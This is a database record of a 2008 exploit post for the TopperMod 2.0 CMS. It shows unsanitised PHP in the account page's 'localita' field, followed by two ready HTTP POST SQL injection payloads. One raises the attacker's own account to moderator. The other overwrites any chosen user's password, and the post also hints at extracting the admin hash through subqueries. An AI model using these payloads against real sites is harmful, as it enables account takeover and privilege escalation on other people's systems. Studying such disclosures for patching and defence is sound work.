{"id": "SECURITYVULNS:DOC:19525", "bulletinFamily": "software", "title": "TopperMod 2.0 Remote SQL Injection Vulnerability", "description": "# Author: __GiReX__\r\n# mySite: www.r57shell.in\r\n\r\n# CMS: TopperMod v2.0\r\n# Site: www.wikipediatr.com\r\n\r\n# Bug: SQL Injection\r\n\r\n# Type: 1 - Priviledge Escalation (from user to mod)\r\n 2 - Remote user password change\r\n\r\n# File: /account/index.php\r\n# Var : $localita\r\n\r\n# Need: magic_quotes_gpc = Off\r\n You must be logged in\r\n\r\n\r\n# Vuln Code: /account/index.php: \r\n\r\n case "edituser_save":\r\n ...\r\n\r\n\r\n $localita=$_POST['localita']; \r\n ...\r\n\r\n if ($localita!="") { \r\n if (eregi("^[a-zA-Z0-9]",$localita)) {\r\n $localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);\r\n }\r\n }\r\n\r\n# And if our $_POST['localita'] does not begin with a char or a number?\r\n# Input not sanizated\r\n \r\n ...\r\n $res=dbquery("UPDATE ".PREFISSO."_utenti SET email='$email', localita='$localita', sito='$sito', \r\n tema='$tema_user', time_zone='$time_zone' $pass \r\n WHERE user_id='$user_id' "); \r\n\r\n# Vulnerable query :D\r\n\r\n \r\n\r\n# PoC 1:\r\n\r\n POST /[PATH]/mod.php?mod=account HTTP/1.1\r\n Host: [TARGET]\r\n ...headers...\r\n\r\n email=someone@somewhere.dot&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]\r\n\r\n# PoC 2:\r\n\r\n POST /[PATH]/mod.php?mod=account HTTP/1.1\r\n Host: [TARGET]\r\n ...headers...\r\n\r\n email=someone@somewhere.dot&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]\r\n\r\n\r\n\r\n# Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must forget in the content the end quote\r\n# We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times\r\n# and Admins don't use cookies in this CMS...", "published": "2008-03-27T00:00:00", "modified": "2008-03-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19525", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 6, "enchantments": {"score": {"value": 1.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8841"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8841"]}]}, "exploitation": null, "vulnersScore": 1.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645323566}}

{}